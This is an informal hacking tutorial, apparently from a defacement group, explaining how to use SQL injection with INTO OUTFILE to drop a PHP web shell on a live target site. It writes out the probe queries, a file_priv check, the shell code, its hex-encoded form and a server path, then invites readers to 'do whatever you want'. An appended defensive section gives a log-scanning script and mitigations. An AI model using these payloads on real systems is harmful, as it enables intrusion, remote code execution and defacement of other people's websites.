How to Deface via SQL-Injection Into Outfile

Yo, what's up guys, and btw Assalamu'alaikum.. :)
Let me introduce myself: I'm Umam, the best-looking guy in Ghost Riddiculous Team. This time I want to share some knowledge: how to deface via SQL-Injection Into Outfile - Upload shell without admin panel.
Let's get straight to it, no small talk h3h3

1. Internet, obviously
2. A target, bro. Without a target, what are you going to do? :v
3. Coffee + smokes 😎

Live target:

Step one, as usual, is to look for the error first with a quote '. If it errors, it's vuln. Run order by 1000 --+- as in the image below.

There, an error like this shows up..
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in D:\xampp\htdocs\bernadyland\berita\lihatDetailBerita.php on line 4

Now, step two: do the usual union select.. once it shows the "lottery numbers" as in the image below..

we go straight to checking file_priv, e.g.: union select 1,2,file_priv,3,4 from mysql.user-- -

If the letter Y shows up as in the image below, it means it's writable / into outfile is possible. If not? Well, what can I say, we're nothing to each other anyway. Oh well.. ;)

Here I picked number 4. Why? Because I love you h3h3 :)
See, the letter Y shows up, so now it's time for into outfile. How's it done? Like this, bro, e.g.: union select 1,2,<?php if(isset($_GET['grt'])){ echo system($_GET['grt']); }? >,4,5 into outfile '/home/user/public_html/tes.php'-- -

Hex-encode the PHP code first, bro. Whether you use that code or go straight to an uploader is up to you; what matters is that it's in hex. It ends up like this: union select 1,2,0x3c3f70687020696628697373657428245f4745545b27677274275d29297b206563686f2073797374656d28245f4745545b27677274275d293b207d3f203e,3,4 into outfile 'D:/xampp/htdocs/bernadyland/berita/test.php'-- -

This is the environment obtained from the error image above.

Once that's done, just access the cmd shell.
Here we're playing with RCE; if RCE doesn't work, just go straight to an uploader using the hex code from earlier.

The RCE goes like this -O shell.php

Then just access it again.

The site from the screenshots earlier :v
mirror :

OK, do whatever you want with it :)
btw, leaving my nick: Umam 1337

Thanks to all members of Ghost Riddiculous Team
Apologies if anything is poorly worded.
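
Seen from the defender's side, each stage described above (the order by probe, the union select, the file_priv check and the into outfile write with a hex literal) leaves a recognizable request in the web server's access log. The following is an added example, not part of the original post: a small Python log scanner whose function names, rule names and sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per stage described in the post; patterns run on decoded, lowercased text.
RULES = [
    ("order_by_probe", re.compile(r"\border by \d{2,}")),
    ("union_select", re.compile(r"\bunion (all )?select\b")),
    ("file_priv_check", re.compile(r"\bfile_priv\b.*\bmysql\.user\b")),
    ("into_outfile", re.compile(r"\binto (out|dump)file\b")),
]
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){8,})")

def normalize(raw):
    """Undo up to three layers of URL encoding, collapse whitespace, lowercase."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).lower()

def classify(request_line):
    """Return the names of every rule that matches one logged request line."""
    text = normalize(request_line)
    hits = [name for name, rx in RULES if rx.search(text)]
    for match in HEX_LITERAL.finditer(text):
        # Decode hex literals so a script hidden as 0x... is still recognized.
        if b"<?" in bytes.fromhex(match.group(1)):
            hits.append("hex_encoded_script")
            break
    return hits

# Constructed sample request lines (not taken from any real log).
SAMPLE_LOG = [
    "GET /berita/lihatDetailBerita.php?id=7 HTTP/1.1",
    "GET /berita/lihatDetailBerita.php?id=7'+order+by+1000+--+- HTTP/1.1",
    "GET /berita/lihatDetailBerita.php?id=-7+union+select+1,2,file_priv,3,4"
    "+from+mysql.user--+- HTTP/1.1",
    "GET /berita/lihatDetailBerita.php?id=-7%20UNION%20SELECT%201,2,"
    "0x3c3f706870206563686f20313b203f3e,3,4%20INTO%20OUTFILE%20%27C:/web/t.php%27--+- HTTP/1.1",
]

def scan(lines):
    """Return (line_number, hits) for every line that matched at least one rule."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := classify(line))]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The file write in the last stage depends on the application's MySQL account holding the FILE privilege (the Y in file_priv); revoking it and restricting secure_file_priv removes that step, and parameterized queries remove the injection itself.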
